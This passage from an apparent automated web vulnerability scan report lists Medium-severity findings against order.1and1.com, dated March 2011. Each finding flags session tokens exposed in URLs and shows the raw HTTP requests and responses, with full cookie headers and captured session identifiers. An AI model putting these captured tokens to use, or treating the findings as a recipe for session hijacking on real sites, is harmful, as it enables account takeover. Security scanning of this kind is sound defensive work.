<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Mail&amp;page=switch&amp;linkOrigin=Mail&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Mail/vi_mail_address.png" alt="Mail" class="pos alphapng" style="margin-left: -40px;" width="299" height="86"><a class="btn btn-yellow-large btn-select" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-select" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-select" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
<p>* Offers valid for a limited time only. Setup fee and other terms and conditions may apply.
<a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Mail&amp;linkOrigin=Mail&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Mail&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.79. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.80. http://order.1and1.com/xml/order/MailInstantMail

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:24:19 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.domains
Content-Length: 0
Connection: close
Content-Type: text/plain


3.81. http://order.1and1.com/xml/order/MailXchange

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:24:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.ecommerce
Content-Length: 0
Connection: close
Content-Type: text/plain


3.82. http://order.1and1.com/xml/order/MicrosoftExchange

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:25:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Connection: close
Content-Type: text/plain


3.83. http://order.1and1.com/xml/order/Moneyback

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Moneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Moneyback?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.84. http://order.1and1.com/xml/order/MsHosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=MsHosting&amp;linkOrigin=MsHosting&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=MsHosting&amp;page=switch&amp;linkOrigin=MsHosting&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.tab.linuxhosting" rel="button-hd-tab-linuxhosting"><span>
...[SNIP]...
<h2 class="nolink"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Service &amp; Support</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/FirstWebsite;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">First Website</a>
...[SNIP]...
<li><a rel="height=480, width=665" class="window-open core_button_normal" href="/xml/order/Moneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
90-Day Guarantee
</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">International Customers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/News;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">News</a>
...[SNIP]...
</h4><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;origin.page=MsHosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on"><img src="/oneandone_en_common/img/frontend-hosting/teaser/teaser_ngh.png" alt="" class="alphapng" title="1&amp;1 MyBusiness Site" width="112" height="70">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;origin.page=MsHosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on">


Details
</a>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-beginner-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-home-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-business-package-bundle"><span>
...[SNIP]...
